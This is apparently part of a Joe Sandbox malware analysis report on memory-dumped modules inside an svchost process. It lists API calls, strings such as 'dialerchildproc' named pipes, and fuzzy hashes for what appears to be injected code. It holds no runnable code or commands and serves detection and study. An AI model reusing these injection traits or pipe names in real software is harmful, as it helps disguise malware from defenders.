                                                        control_flow_graph (collapsed): 1cbd8ba6910 is MSVC CRT DllMain startup code for the module at 1cbd8ba0000 (see the __scrt_* names in the API ID below); it dispatches on the reason code (1cbd8ba6918-1cbd8ba6936, calling 1cbd8ba6f04 or __scrt_dllmain_crt_thread_attach at 1cbd8ba6938), runs the initializer sequence 1cbd8ba6fc0 / 1cbd8ba6e54 / 1cbd8ba6ec4 / 1cbd8ba72dc / 1cbd8ba6e0c / 1cbd8ba6e38 / 1cbd8baac0c with __scrt_dllmain_after_initialize_c (1cbd8ba69de) and 1cbd8baabc8, has an alternative path through 1cbd8ba6f7c / 1cbd8ba6e1c / 1cbd8ba7318 / 1cbd8ba7130 / 1cbd8ba7154 / 1cbd8ba6fac, and in its second half (1cbd8ba6a78 onward) re-enters 1cbd8ba6910 and calls 1cbd8bb5780 around 1cbd8ba268c before returning at 1cbd8ba6c1f
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 07fdd0c7d24b3d781066f053deca9409dd143e813ed5482003d316b44598c601
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 7881D3B178C7018AFA909BE594C3BF92290EB5678EF4440159A4FC3796DBBBC845C788

                                                        Control-flow Graph

                                                        control_flow_graph (collapsed): 1cbd8bdce28 matches the CRT's FLS-backed per-thread data lookup: GetLastError (1cbd8bdce37), FlsGetValue (1cbd8bdce4c), and when no slot value exists an allocation through 1cbd8bdd6cc (HeapAlloc) stored with FlsSetValue (1cbd8bdce6d, 1cbd8bdce9a, 1cbd8bdceab, 1cbd8bdcebc), with 1cbd8bdcb94 / 1cbd8bdd744 (HeapFree) on the failure paths and SetLastError (1cbd8bdced7) restoring the caller's error code; the same sequence repeats from 1cbd8bdcf0d via 1cbd8bdc748 for a second slot (FlsSetValue at 1cbd8bdcf2c, 1cbd8bdcf54, 1cbd8bdcf65, 1cbd8bdcf76)
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001CBD8BDCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEBC
                                                        • SetLastError.KERNEL32 ref: 000001CBD8BDCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001CBD8BDECCC,?,?,?,?,000001CBD8BDBF9F,?,?,?,?,?,000001CBD8BD7AB0), ref: 000001CBD8BDCF2C
                                                          • Part of subcall function 000001CBD8BDD6CC: HeapAlloc.KERNEL32 ref: 000001CBD8BDD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF54
                                                          • Part of subcall function 000001CBD8BDD744: HeapFree.KERNEL32 ref: 000001CBD8BDD75A
                                                          • Part of subcall function 000001CBD8BDD744: GetLastError.KERNEL32 ref: 000001CBD8BDD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF76
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 380e374fd0efe43d558c039f956dcbd27f9d5249dad7ecb7c9ae31faf30a61ac
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 06413C702CD34462F96967F595E3BF922539B447AEF141B24A83FC67E6EB2BD401C280

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 8d495f9292460a9735da5ed95210fda6fbe957da3286c33244c8f36ea02638a3
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 52219032258B508AF710CBA4E4857A963A1F3857AAF400215DA5E82BA8CF3EC149CB40

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: a62b4a5be1d7a59fcf86fd4f7d53b3e4fe5156bf132faf2773fff64dd797c087
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 49E19C32648B408AFB608BE5D482BFD37A0F745B8DF100106EE9E87B96CB76C094C784

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: f93e4a1daa0d78cdaddb0cd674ab4af90492db7ec0da77687cb0fc27551b55aa
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 2DE18D72648B40AAFB209FE59482BED77A2F74479DF141115DE8F97B96CB3AC081C780

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 32bd6cb2b4fe6735583b648f74334685912bda2f5fa339ee11d04b3235dc61ab
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 3041133239DB01A5FA12CBD6A881BF52792FB45BAAF0441258D0FD7795EB3BC405C380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 066eb5fd8941bfc650680b4864ba2459917eed432ccf800f44e515a7831a054b
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 6D419033218B80DAE761CFA1E4857AFB7A1F389B99F049119DA8E47758DF3AC445CB40
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 71d4662aedf6dbd697b56d36903d8f4ddc6a5a38ef4483e9cb1097fa8a6fd393
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 8311933038D34052FA6457F599D3BF92243DB843A9F185624586FC67E5DF1BC401C280
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 0106aeadf5537429d751d842193ee5b2217affcef9ad2f21424a8c74e39b0775
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: EE8105B068C701AAFA519BE594C3FF92692E74578EF144425990FC7796EB3BC403C788
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: c9b8f5ea63e900bb7e76ad3c81d051b3b44ab0de19cb25040923075a332a8adb
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: A731F63124A700F6FE169BC2A481BF522D5B748BAAF1906259D2F87791DF3BC459C380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: eb7377fe2b6302bf55bf176071237aa04aac1f273150e96e86d659a293cea9b9
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 5D115131258B408AF7528BD2E895B6977A0F789FEAF044214EA6FC7794CB3BC514C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 59217231f7a3652f0728cb9fcaba971148e9c2b568802b1bfc5c67614d1d01f2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: D111AC36748B408AFF158BD1E085AA962A1F789B8AF040028DE8F87756EF3FC504C744
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 2535d574b1785d2b1a42f984cfa41e71c2a54c3512dbc8327d59fc37f128c4a0
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 93D1BE76249B4891EA70DB86E4917AE77B1F388B89F100116EACF87B65CF7EC541CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 1cba4eec41f719f4423791475f4ed57158e1c05105fd208c51b5bbf463187363
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 77311532349B5096F611CFD6E581BBA6395FB44B8AF0844209E4F83B5AEF37D460C380
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 537801d7384df499510b0516e733ebe0744c8f24ed2dd7c99d327c711a9b615e
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B2116F3028D34062FA2557F195D3BF92253AB847BEF141724A86FC67E6DF2BC401C280
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 4e1a75a037d890f7a3af027752f69dd1f5d83a83d0a6e2d613213ff947cde410
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 80018E31348B408AF611CBD2A488BAA63A1F749BCAF444035DE5E83754DF3AC589C380
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 7f1ef5d5059ce12c61f5d97a27b9455fb86792ee4b09ca0f56259de58aeb52b2
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 6D016574659B408AFB259BD1E48ABA567A1B749B8BF040425CD4F87765EF3FC104C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 4c990827edacdc3879a7cb4c8e50599e697146fcddd6f7e908c96fcc5a92b3c1
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 1B517D32649701AAFB149B95E48AFBA27D7F345B9EF119124DA1F83748EB37D840C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 5b401db059e9ca29837f15a6baad8a1f4cd991064a946fc7a0a4d37f863a2710
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: F9318E31248740AAF714DF91E886BBA37A6F344B8EF058124AE4F83745DB3BD940C784
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: b74828290f2ae62677b66e179717fd8b661321355523e7ba451828796880c1a7
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: DBF0813234874096F7208BE4E8C5BA96361F748B9DF845020CA4E86954DB2FC64DCB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 37321554d2df0aa79fc22873e2386afc887469eaa0481ba7fb1d3ff3d9e834d8
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: C0F0AF7125970489FB118FE4E4C6BB92321EB8977AF4402198A6F851E4CF2BC049C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 3c5f480dda9202fff783b6f139fd1f0141ab971eaac63cb1c0237ba01f6de79c
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: A2F0543068878085FA144BD6B9955A56261AB49FD6F084120DD4F87B15DF2AC445C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 32d60e69eea9e2b2788f8227f4ad6006050a75537e6b2dfa38ae953cf35e1181
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 2902E83225DB8486E760CB95E4917AEB7A1F3C4789F101015EA8F87BA9DFBEC444CB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 9c1493acfd7b5872a94b8db0ae71fae0010280c453ccaf9609f860de902d1b3d
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 9C61F83655DB40C6F7608B95E485BAE77A1F388789F105116EA9F87BA8CBBFC440CB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 62decd75e8cd862665d9d8c7f09f2ea4bdb99cc7548c456523e92675cecc9a33
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 2511C4726DCB0151FA5411E8E6D3BF910C06B5CB7EF484638A96F862F78B27F848C180
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: f252b24e3e3f9fbba2903bc14e13e79b0561aa045f8524dcd908ab4369d06102
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 1D118232A98F5019FE6615E8D4D7FF619417B683AEF080624A57FC66D68B2BC841C182
                                                        APIs
